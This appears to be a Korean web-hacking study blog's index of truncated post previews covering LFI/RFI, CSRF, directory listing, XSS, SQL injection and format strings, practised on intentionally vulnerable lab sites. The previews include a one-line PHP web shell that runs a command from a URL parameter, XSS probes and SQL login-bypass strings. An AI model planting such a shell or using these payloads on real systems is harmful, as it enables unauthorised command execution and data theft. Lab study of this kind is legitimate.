LFI(Local File Inclusion) & RFI(Remote File Inclusion) 개념 LFI 서버의 로컬 파일을 읽거나 실행할 수 있게 하는 취약점. 웹 애플리케이션의 취약한 파라미터에 악의적인 파일 경로를 삽입하여 악성 스크립트를 실행. RFI 웹 애플리케이션이 외부 UR...

File Inclusion LFI DVWA BWAPP RFI BWAPP 칼리 리눅스에 php 파일 생성 <?php $output = shell_exec($_GET[“cmd”]); echo “$output”; ?> 칼리 리눅스 아파치 실행 칼리 리눅스 아파치에 접근하고 명령...

CSRF 개념 사용자가 자신의 의지와는 무관하게 공격자가 의도한 행위를 수행. 사용자가 인증된 상태에서 공격자가 준비한 악의적인 링크 또는 스크립트를 실행. 해당 웹사이트는 이를 사용자의 요청으로 인식하고 공격자가 원하는 작업을 수행. 디렉토리 리스팅 개념 웹 서버 설정 오류로 인해 웹 사이트의 디렉토리 구조와 파일 ...

CSRF BWAPP 사이트 / DVWA 사이트 Get으로 새로운 패스워드를 전달하기때문에 취약함 디렉토리 리스팅 BWAPP 사이트 / DVWA 사이트 웹쉘 코드 simple_cmd.php 코드 G-Security Webshell <body bgcolor=#000000 text=#ffffff "> ...

XSS (Cross-Site Scripting) 개념 웹 사이트에 악성 스크립트를 삽입하여 사용자의 브라우저에서 실행되도록 하는 공격 기법. 공격자는 사용자의 쿠키, 세션정보 등을 탈취하거나 악성 코드를 실행하여 시스템을 장악. 세션 사용자가 웹사이트에 접속하여 활동하는 기간. 세션동안 사용자의 정보는 서버에 임시로 저장. ...

XSS (Cross-Site Scripting) 저장형 XSS 1. Acunetix 사이트 URL: http://testphp.vulnweb.com/listproducts.php?cat=1 실습 스크립트: <script>alert("test")</script> 브라우저에서 “test”라는 경고창 표시 &lt...

SQL Injection 개념 SQL Injection은 웹 애플리케이션의 입력 필드에서 악의적인 SQL 구문을 삽입하여 데이터베이스를 조작하거나 정보를 탈취하는 공격 기법 공격자는 인증 우회, 데이터 유출, 데이터베이스 조작, 시스템 권한 상승 등의 행위를 수행할 수 있음 원리 입력 값 조작 사용자가 입력한...

SQL 인젝션 취약 사이트 실습 1. AltroMutual 사이트 URL: demo.testfire.net admin' -- ' or 1=1 ' or 'a'='a 2. DVWA 사이트 환경: Metasploitable 2의 DVWA ' or '1'='1 ' or true# 1' or '1=1 ...

포맷 스트링 - 개념 printf, fprintf, sprintf 등의 함수에서 사용되는 출력 형식 지정 문자열 데이터를 어떤 모양으로 출력할지 결정하는 규칙 일반 텍스트와 함께 서식 지정자를 포함 % 기호로 시작하며 뒤에 오는 문자에 따라 데이터의 출력 형식이 결정됨 - 종류 %d : 10진수 정수 형태로 출력 %x...

포맷 스트링 ### 실행할 때마다 %x의 값이 달라짐 뒤쪽의 61616161 부분은 61이 a이므로 aaaa라는 것 확인 가능 bbbb를 넣으면 62로 바뀌는 것 확인 가능